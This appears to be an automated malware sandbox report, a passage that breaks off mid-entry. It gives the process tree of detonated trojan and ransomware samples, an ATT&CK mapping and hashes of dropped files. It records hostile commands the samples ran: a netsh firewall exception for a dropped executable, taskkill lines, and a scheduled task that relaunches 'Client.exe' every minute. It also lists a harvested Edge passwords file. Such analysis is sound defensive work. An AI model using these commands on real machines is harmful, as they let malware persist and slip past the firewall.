- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-466841e0cfbae323f68ec6283ba91acd56ffe861c77a3c5f7c618bd2f715fca6.exe
    HEUR-Trojan.MSIL.Crypt.gen-466841e0cfbae323f68ec6283ba91acd56ffe861c77a3c5f7c618bd2f715fca6.exe
    3⤵
    PID:4608
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-521798e7fc5b493255379ac100b4a7cc094c46d0ab0e572097bd6f5045cff824.exe
    HEUR-Trojan.MSIL.Crypt.gen-521798e7fc5b493255379ac100b4a7cc094c46d0ab0e572097bd6f5045cff824.exe
    3⤵
    PID:6288
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-5aab1a11e7a841129342bf643c7916f2b6eb1f5de85d7dfe0a434a414b932bb4.exe
    HEUR-Trojan.MSIL.Crypt.gen-5aab1a11e7a841129342bf643c7916f2b6eb1f5de85d7dfe0a434a414b932bb4.exe
    3⤵
    PID:6336
  - - C:\Users\Admin\AppData\Local\Temp\b9119bd7-bed8-4618-b746-cf10336f7a3c.exe
      "C:\Users\Admin\AppData\Local\Temp\b9119bd7-bed8-4618-b746-cf10336f7a3c.exe"
      4⤵
      PID:7236
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-5d6272028e58571ac67a39a449ccd6666dad00ecc4fd457db918e4448284f236.exe
    HEUR-Trojan.MSIL.Crypt.gen-5d6272028e58571ac67a39a449ccd6666dad00ecc4fd457db918e4448284f236.exe
    3⤵
    PID:6424
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 852
      4⤵
      Program crash
      PID:6916
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-615ae4e917dab894699846dc78a8c9daf07fcbe5f4ad06483b8a4a5bd17d9e4e.exe
    HEUR-Trojan.MSIL.Crypt.gen-615ae4e917dab894699846dc78a8c9daf07fcbe5f4ad06483b8a4a5bd17d9e4e.exe
    3⤵
    PID:1076
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-67476b6ffbd142ade3dd16f0f91673a04b0cd10262afea29bc20ddb26a087404.exe
    HEUR-Trojan.MSIL.Crypt.gen-67476b6ffbd142ade3dd16f0f91673a04b0cd10262afea29bc20ddb26a087404.exe
    3⤵
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\53e8df59-9b95-4af3-8955-1253b4c6949c.exe
      "C:\Users\Admin\AppData\Local\Temp\53e8df59-9b95-4af3-8955-1253b4c6949c.exe"
      4⤵
      PID:7128
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-6a4dc64b7df47c9397fccb7f9cf098737cfff9747a8970c039e88d226ced69bd.exe
    HEUR-Trojan.MSIL.Crypt.gen-6a4dc64b7df47c9397fccb7f9cf098737cfff9747a8970c039e88d226ced69bd.exe
    3⤵
    PID:7724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 1576
      4⤵
      Program crash
      PID:5424
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-813797b7a9acf4262cf567f0cbe09ebd6be5d5c446ebe4fa5c147e7b94bf5ad4.exe
    HEUR-Trojan.MSIL.Crypt.gen-813797b7a9acf4262cf567f0cbe09ebd6be5d5c446ebe4fa5c147e7b94bf5ad4.exe
    3⤵
    PID:5888
  - - C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe
      "C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe"
      4⤵
      PID:6076
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\explorer.DLL.exe" "explorer.DLL.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:8028
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-ade170d43b102f5e2910339388771eea6b75308124d4bfdb840672d522ad4596.exe
    HEUR-Trojan.MSIL.Crypt.gen-ade170d43b102f5e2910339388771eea6b75308124d4bfdb840672d522ad4596.exe
    3⤵
    PID:7792
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c234fec6829e93fc69b390373b9d7bcea9ed5772f3674b842a4e943c3edbf320.exe
    HEUR-Trojan.MSIL.Crypt.gen-c234fec6829e93fc69b390373b9d7bcea9ed5772f3674b842a4e943c3edbf320.exe
    3⤵
    PID:7392
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c260f2424f0df4e3c657bb98f5f7d6b87809421b85e84284215db3c254e7b1ef.exe
    HEUR-Trojan.MSIL.Crypt.gen-c260f2424f0df4e3c657bb98f5f7d6b87809421b85e84284215db3c254e7b1ef.exe
    3⤵
    PID:5708
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-c85da5228d681603c78ae24ac58f26c7eeb812eca581cc955db4de51d8442661.exe
    HEUR-Trojan.MSIL.Crypt.gen-c85da5228d681603c78ae24ac58f26c7eeb812eca581cc955db4de51d8442661.exe
    3⤵
    PID:5764
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 1068
      4⤵
      Program crash
      PID:7172
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-db4f98133dd11d5b6a6e894c777bae318b8beb17effe21283ca133a39e461a3c.exe
    HEUR-Trojan.MSIL.Crypt.gen-db4f98133dd11d5b6a6e894c777bae318b8beb17effe21283ca133a39e461a3c.exe
    3⤵
    PID:6720
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-e134a6c799de4a4705eebb7fd139c9c1b1f0a2e8b527e732ee7a40fdc5f49ee4.exe
    HEUR-Trojan.MSIL.Crypt.gen-e134a6c799de4a4705eebb7fd139c9c1b1f0a2e8b527e732ee7a40fdc5f49ee4.exe
    3⤵
    PID:4740
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan.MSIL.Crypt.gen-ebaa163e986e04be1995759c109497df965f7b601eec73d3a280318b9f5c501d.exe
    HEUR-Trojan.MSIL.Crypt.gen-ebaa163e986e04be1995759c109497df965f7b601eec73d3a280318b9f5c501d.exe
    3⤵
    PID:8324
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:7176
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
    3⤵
    PID:4056
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"
      4⤵
      PID:5180
    - - C:\Users\Admin\Desktop\00486\Setup.exe
        
        "C:\Users\Admin\Desktop\00486\Setup.exe"
        5⤵
        
        PID:8356
      - C:\Users\Admin\AppData\Local\Temp\is-021EK.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-021EK.tmp\Setup.tmp" /SL5="$30784,3291817,140800,C:\Users\Admin\Desktop\00486\Setup.exe"
        6⤵
        
        PID:7076
    - - C:\Users\Admin\Desktop\00486\smss.exe
        
        "C:\Users\Admin\Desktop\00486\smss.exe"
        5⤵
        
        PID:8316
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:6060
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:5168
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:6104
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com
        6⤵
        
        PID:7472
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
    3⤵
    PID:3640
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
    3⤵
    PID:968
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
    HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
    3⤵
    PID:8680

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4560
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1968 -ip 1968
1⤵
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1968 -ip 1968
1⤵
PID:3032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6424 -ip 6424
1⤵
PID:6672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5764 -ip 5764
1⤵
PID:6720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7724 -ip 7724
1⤵
PID:1364

C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
1⤵
PID:3920
- C:\Windows\SysWOW64\TASKKILL.exe
  TASKKILL /F /IM wscript.exe
  2⤵
  - Kills process with taskkill
  PID:6420
- C:\Windows\SysWOW64\TASKKILL.exe
  TASKKILL /F /IM cmd.exe
  2⤵
  - Kills process with taskkill
  PID:6904
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /Delete /tn NYAN /F
  2⤵
  PID:3940
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /sc minute /mo 1
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3420

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:3856

C:\Users\Admin\AppData\Local\Temp\Client.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
1⤵
PID:5412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:7804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaf87746f8,0x7ffaf8774708,0x7ffaf8774718
  2⤵
  PID:5696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Proxy

T1090

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7-zip.chm

Filesize
1.8MB

MD5
1611d8ecc6d5b4b0ded715c2a9ee6e83

SHA1
d5963c0eee67cf80f2054c55b01e85f7101e8964

SHA256
803a8ec74c26ae50be55c7fdc2a83724c00c709f96631ada3a610c23e4527e61

SHA512
11364afb17ed435a043f6a6fec6efbb98fb2fa842cdf16a8db159476e5e4f785d7416938c57e3ca727ce0aff9aec9baf81edeb0b0c221898550ace18b2455c61

Download Submit
C:\Program Files\7-Zip\7-zip.chm.exe

Filesize
1.8MB

MD5
fc9ae62e17cf7631f608465f3175d7e8

SHA1
0bba6255bfd96489a33c8a03414826b5519cf42a

SHA256
28ff56ff2516342aeece91b6293574c5f01fbe21edea393afdf6800cd8908f07

SHA512
841ce71270b5e6f757b45f1e75b97c41089f381286eb1dbda3ace9471570ce30a9d96d421a736ef93a393c7ac67cc66b7435df6506b132b0f9e27ffe97b35918

Download Submit
C:\Program Files\7-Zip\7-zip.chm.exe

Filesize
1.8MB

MD5
6801e9e3cdd2eb4f0f29e0ca341dbf35

SHA1
132b4a8b3324577409391397d80dcce48e8c5e13

SHA256
a613af431e1aeb70d5777b6339170dc8ec0b523456cc00483a5d02fe0a6cf899

SHA512
419fc736ce32d2756ec01ef2ff0dfd2065a1c69a585982cdc789a107d4d8d545ab30a02afa90782aa2520aba05917e1c2441e10fb75813d8ecf6e515037e5eb5

Download Submit
C:\Program Files\7-Zip\7-zip.dll.exe

Filesize
1.8MB

MD5
4dfb81a99ae48ecf445300deb1071507

SHA1
d18e02e3ee85e53ccd8a18502bf88ade49f47bce

SHA256
8dac7665a61b1190c37f2b3299d71c8487b87097c879652464fe322cf2eac94e

SHA512
f96d2d86c64091ac531a8ba1388209d276ea0a6cbdc0a6c44b4e82fbf6495a223668e871cbe21d6ed59b1262d108c11905c8d36be8789b95dd0fd0d4edc0d3ae

Download Submit
C:\Program Files\7-Zip\7-zip32.dll

Filesize
1.8MB

MD5
fa002b8a045b00b4a76ec17b38536c1b

SHA1
20425bac19a826dba7fe2cbbdd2a82ecbff87d1d

SHA256
b73a0b53cc37de2fd8b4697a98b0bc16c87dfbbf42cd36d1dfe141e87bf8254d

SHA512
d94b7eefaf745316a6953f836e1ec6f50ed416d0f7190640658183476b2277a0dc095e19eadd0987fd29dcd2ba91583ad8f054e906afb5372194fb0137db7dc9

Download Submit
C:\Program Files\7-Zip\7-zip32.dll.exe

Filesize
1.8MB

MD5
fa502ffd3099aff52f000fbe1a3f1f82

SHA1
9b690680e3ee97af364b1df0c954b91ac251d604

SHA256
61e8c0078d2238156371c2559c18d7b0dab31083bcd75a49a0246e460bbe1d61

SHA512
d005bcab354905f952d10eaa7aaf6bea3aef1c9491c876cb02a432d3069e201d8d59be140e8b65c934301f8488805b3c9704aa2c0949066f3f43630ed9a60d5c

Download Submit
C:\Program Files\7-Zip\7z.dll

Filesize
1.8MB

MD5
d36c0b527f25daa029bbdc9cb8bfe6c4

SHA1
9ffd1b440621d6c51496ab9c9bbad7d98cd27e3a

SHA256
a7b795748afe7e4de44ba743584b9fe754c604f20610277f70d8f9a8402a1eff

SHA512
d97042c9372a454e5111fd2a111d26ca83fc4439eb7cd095b14076fc1ecd03434f035c38f3a829dfc8d84bf2606630ad224110891a3d1a5e81b6234cb80f0dde

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\JyuPwJZXBTwBHFZuuuH7E0F1DF576\767E0F1DF5JyuPwJZXBTwBHFZuuuH\Browsers\Passwords\Passwords_Edge.txt

Filesize
426B

MD5
42fa959509b3ed7c94c0cf3728b03f6d

SHA1
661292176640beb0b38dc9e7a462518eb592d27d

SHA256
870ef3d2370932a8938faa60abd47d75ea0af98bfa11c82ae8efe9e94fd8be00

SHA512
7def291737d081c93d0cc38ac8d3062fd34d93b68d191eb0d54e9857e0c0afdbcd241471a2e10c28ce8db3b1d1ae0dba2ef6f609cfe8a1e8fe1dd103dba80007

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HEUR-Trojan.MSIL.Crypt.gen-c260f2424f0df4e3c657bb98f5f7d6b87809421b85e84284215db3c254e7b1ef.exe.log

Filesize
1KB

MD5
9b14bbf1a65f8c3c91d2bc7eca4b53cc

SHA1
cb7d2cd6733da10d2d726e8bd133b34308e3deac

SHA256
bf16555190bd1a1852ec7079785c2063ce1b633ec36cabcc6b1105249b2973ec

SHA512
fc39c9f6b1d90f03b533824db61e87b11174d12cade7a9e485e20e0146b808c24f9d07402733f40e7d26ab04a6367220cd449e5ed5f0a2ef2b9762dd7f7ed484

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3838bcce2d6a90453c97e077c9c29acd

SHA1
267797682514924c7b13b2c6ee3b7d54c12537c1

SHA256
64c760d6bb728b4126dcbeb3804aa490fee07e16a085f7af7e9d157e46f11a80

SHA512
937d3ae2fdb04e213cc25e7593a8767a4d24b22a80991720d88c6855da4b602aa75e299228ed5a020adbd9dcbc9294f0a670d01ffe9d4ec5da022e2b7e6a66dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a210b55aded73b2248fc6befecf97ac

SHA1
116740a92b20a51523d34f58ee4073557f15a2fa

SHA256
50b88de1425817b6d8b443056b45039c874f31624deef02fd74f91668dde808f

SHA512
f5b6746e98242c40cd9252143e1050c06cebf891d7cf76772da9c49002607afdd979b9f26399698cc46b706e7f2891a4f228a6459bea9ed09610bbde4a73620c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7e7b06486ae05b0ce8291d98287b17c1

SHA1
66664820b27818d8c1a30821b62e57769dbef679

SHA256
4ed6790f8bdf56b9fa8dbf56ac33f9c3e281720fd431ff5d03688de29cb96c1d

SHA512
120137fc243ca8fab38d7ba3f59505c0c06087a8eb2ee99aec361c1083a916409a9cea311d55c7a77e3123e4a91a906c85ef56f185f1f7fe4dbe1c289a921321

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c128957a368566763d1c08c3929707f3

SHA1
f9e6cf888ebe5ed0e2b5f0abb20f8110afa28975

SHA256
bdec71c564d7602faac6d0ee4251c1e374c3a848dca11dd11d39118931c40959

SHA512
1f30a8f91706deadb16424a8477ca0c8c712163d71525e394e4fa6fbfa5f05a03f359f7badaece7f3549c51db5df8dfd9e61364e84a8389a21e4f6d0922f9b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\4cf45a43-5c69-4117-9960-a5763c5fa241.exe

Filesize
4KB

MD5
f80fa38d37eb2d1d1d3aec66003b5780

SHA1
fd5e87fe12df96def7ec3823744c063ecbcf653d

SHA256
eec418db69eab627d827a3d1b416ab5960af88ccde836a139f9c9c11d5556f55

SHA512
3c1b9cf19759e80427cd81c53558f031ec0f404fdedf984f7a6635fadb64451a7a59ae4de16a41e4f508541c15e2a7dffcd65eb09cbc3eec442783e5d5a955d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe

Filesize
6.8MB

MD5
a8f2c9b1c6dc9022290900cbf27af571

SHA1
0bd9ba9ebaf967649c102989a1b28394840106ee

SHA256
d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b

SHA512
60f92d9829283ce05f8aaa13466d572e8772d29b699f782f37bb05d232dcf33bca883f1549e2b6ac9d211b7879042f25a973a57460548e7ba4fafbe057826d29

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe

Filesize
1.8MB

MD5
31cf5a53a640bc9a073cbe777a2183ce

SHA1
10941c1910e473bf0b8fb0617bf5f39bda577d81

SHA256
c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1

SHA512
4d59ff48d939016a001ad18819e115c9c3a83bc6d41d5ce6ff9ceb0496753e53ac61420eb061235ffac5dd3d2e84cf6f07c87db11cc151cfc96a94c4b6eea0e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan.Win32.Kryptik.gen-0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0.exe

Filesize
1.1MB

MD5
7bf5be704b75c4924b5a29a8ab05ea30

SHA1
53aa3fd3f60aad9b980cb3ed0d1f169add0530b6

SHA256
0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0

SHA512
be3487e110e5dd9db83b3f0cd1b6e467cf06b613a4bc19cb3bae66100d0bc827948a36c67a78fadca3f88503dbc5bf7eb931a1c4f89318cd0fe167127e5ced42

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan.Win64.Kryptik.gen-6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81.exe

Filesize
2.0MB

MD5
448096c67b45deb3c7593aa88fb86b75

SHA1
c60c8cc75a3a2950dcb78fc4094007b13c7b099f

SHA256
6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81

SHA512
042f276950948d7d7ba3f3965525cb0c64277b7f31e12742bb280e1b520dbb74274253eae748a148d68ee93eb713930bec0b7499a2e5f0202ba0b74975a8d237

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.Cryptodef.aoo-fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc.exe

Filesize
73KB

MD5
18ffed6f715aea3ba8cd567b330faf20

SHA1
8f835470057ba4f832e812fc9f58dd42c0a7acc4

SHA256
fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc

SHA512
c863ac250d1dac03362ce0fd9b5f3ccb0e45084e0715533dede7ab420eb7b4a7fb58228ad3d9c516352a8474ff07c205c64e7709b9d5a7ee5490bfa6e10e51ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.GenericCryptor.czo-877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66.exe

Filesize
184KB

MD5
03531048f4d9369c850888945181cf43

SHA1
1e214deb22fa4dd095d9351d91ac5563aad5e7ba

SHA256
877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66

SHA512
f312faed2f987a9da2ee145f078645825f2785ce483ded263fa3b3d6a884a5e67cad3ffde8dff4a82c67b010262926365d8f947c74dec04a26ee2703f2ecdbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.GenericCryptor.czx-e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894.exe

Filesize
536KB

MD5
e3584b71a215db2c629e6e2877edd6b4

SHA1
01bee60375b7a275f818b051ddc0ddb4a8426006

SHA256
e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894

SHA512
d57474c0cdf0df95b703afbfb1f801765b4fe1030eff1fc1ef971da0392474c585f0c5ce57918528d0a61fce6feaf49b0a80e614f183fede6aa74f6436ea94bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan.Win32.Kryptik.bvw-f3cdb519cba210689a115f86cf1554b3edcad5e12746e109ca7e373caad24fbe.exe

Filesize
548KB

MD5
b678abc39649637794c067fd5b887084

SHA1
52fd922bd1cbddc73b392611e1df9457a3fd0fd8

SHA256
f3cdb519cba210689a115f86cf1554b3edcad5e12746e109ca7e373caad24fbe

SHA512
7fdbcd04119d39eff57094b43471fd902fcdec2b7b286d1d278123d8e85c56a37b2d9451d1afbf1ff6dfbc2fc6e9d9ca256b30fd4a01ce8e3a92088ceb2585ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\Clickermann.exe

Filesize
3.0MB

MD5
8becb410816637816e135d434c7c1ba1

SHA1
5136b51d2e9c47d303653ab650678d7d4d23428d

SHA256
5f7889777637e28831aa3c5516e6f004aa271a5a5be6693855c73429930b388d

SHA512
